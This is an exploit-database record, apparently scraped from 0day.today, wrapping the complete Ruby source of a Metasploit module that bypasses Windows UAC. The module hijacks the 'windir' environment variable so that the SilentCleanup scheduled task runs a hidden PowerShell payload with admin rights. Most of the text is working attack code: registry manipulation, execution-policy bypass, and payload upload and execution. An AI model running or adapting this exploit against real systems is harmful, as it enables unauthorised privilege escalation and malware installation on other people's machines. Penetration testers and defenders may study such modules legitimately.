Windows Escalate UAC Protection Bypass Via SilentCleanup Exploit

{"id": "1337DAY-ID-32920", "vendorId": null, "type": "zdt", "bulletinFamily": "exploit", "title": "Windows Escalate UAC Protection Bypass Via SilentCleanup Exploit", "description": "There's a task in Windows Task Scheduler called \"SilentCleanup\" which, while it's executed as Users, automatically runs with elevated privileges. When it runs, it executes the file %windir%\\system32\\cleanmgr.exe. Since it runs as Users, and we can control user's environment variables, %windir% (normally pointing to C:\\Windows) can be changed to point to whatever we want, and it'll run as admin.", "published": "2019-06-30T00:00:00", "modified": "2019-06-30T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/32920", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-11-07T17:59:58", "viewCount": 308, "enchantments": {"dependencies": {"references": [], "modified": "2021-11-07T17:59:58", "rev": 2}, "score": {"value": 0.7, "vector": "NONE", "modified": "2021-11-07T17:59:58", "rev": 2}, "vulnersScore": 0.7}, "sourceHref": "https://0day.today/exploit/32920", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Exploit::Powershell\n include Msf::Post::Windows::Priv\n include Msf::Post::File\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Windows Escalate UAC Protection Bypass (Via SilentCleanup)',\n 'Description' => %q{\n There's a task in Windows Task Scheduler called \"SilentCleanup\" which, while it's executed as Users, automatically runs with elevated privileges.\n When it runs, it executes the file %windir%\\system32\\cleanmgr.exe. Since it runs as Users, and we can control user's environment variables,\n %windir% (normally pointing to C:\\Windows) can be changed to point to whatever we want, and it'll run as admin.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'tyranid', # Discovery\n 'enigma0x3', # Discovery\n 'nyshone69', # Discovery\n 'Carter Brainerd (cbrnrd)' # Metasploit Module\n ],\n 'Platform' => ['win'],\n 'SessionTypes' => ['meterpreter', 'shell'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' => [['Microsoft Windows', {}]],\n 'DisclosureDate' => 'Feb 24 2019',\n 'References' => [\n ['URL', 'https://tyranidslair.blogspot.com/2017/05/exploiting-environment-variables-in.html'],\n ['URL', 'https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/'],\n ['URL', 'https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/'],\n ['URL', 'https://forums.hak5.org/topic/45439-powershell-real-uac-bypass/']\n ]\n ))\n\n register_options(\n [\n OptInt.new('SLEEPTIME', [false, 'The time (ms) to sleep before running SilentCleanup', 0]),\n OptString.new('PSH_PATH', [true, 'The path to the Powershell binary.', \"%WINDIR%\\\\System32\\\\WindowsPowershell\\\\v1.0\\\\powershell.exe\"])\n ])\n end\n\n def get_bypass_script(cmd)\n scr = %Q{\n if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match \"S-1-5-32-544\")) {\n #{cmd}\n } else {\n $registryPath = \"HKCU:\\\\Environment\"\n $Name = \"windir\"\n $Value = \"powershell -ExecutionPolicy bypass -windowstyle hidden -Command `\"& `'$PSCommandPath`'`\";#\"\n Set-ItemProperty -Path $registryPath -Name $name -Value $Value\n #Depending on the performance of the machine, some sleep time may be required before or after schtasks\n Start-Sleep -Milliseconds #{datastore['SLEEPTIME']}\n schtasks /run /tn \\\\Microsoft\\\\Windows\\\\DiskCleanup\\\\SilentCleanup /I | Out-Null\n Remove-ItemProperty -Path $registryPath -Name $name\n }\n }\n vprint_status(scr)\n scr\n end\n\n def exploit\n check_permissions\n\n e_vars = get_envs('TEMP')\n payload_fp = \"#{e_vars['TEMP']}\\\\#{rand_text_alpha(8)}.ps1\"\n\n # Write it to disk, run, delete\n upload_payload_ps1(payload_fp)\n vprint_good(\"Payload uploaded to #{payload_fp}\")\n\n cmd_exec(\"#{expand_path(datastore['PSH_PATH'])} -ep bypass #{payload_fp}\")\n end\n\n def check_permissions\n # Check if you are an admin\n case is_in_admin_group?\n when nil\n print_error('Either whoami is not there or failed to execute')\n print_error('Continuing under assumption you already checked...')\n when true\n print_good('Part of Administrators group! Continuing...')\n when false\n fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')\n end\n\n if get_integrity_level == INTEGRITY_LEVEL_SID[:low]\n fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')\n end\n end\n\n def upload_payload_ps1(filepath)\n pld = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true)\n begin\n vprint_status('Uploading payload PS1...')\n write_file(filepath, get_bypass_script(pld))\n register_file_for_cleanup(filepath)\n rescue Rex::Post::Meterpreter::RequestError => e\n fail_with(Failure::Unknown, \"Error uploading file #{filepath}: #{e.class} #{e}\")\n end\n end\nend\n"}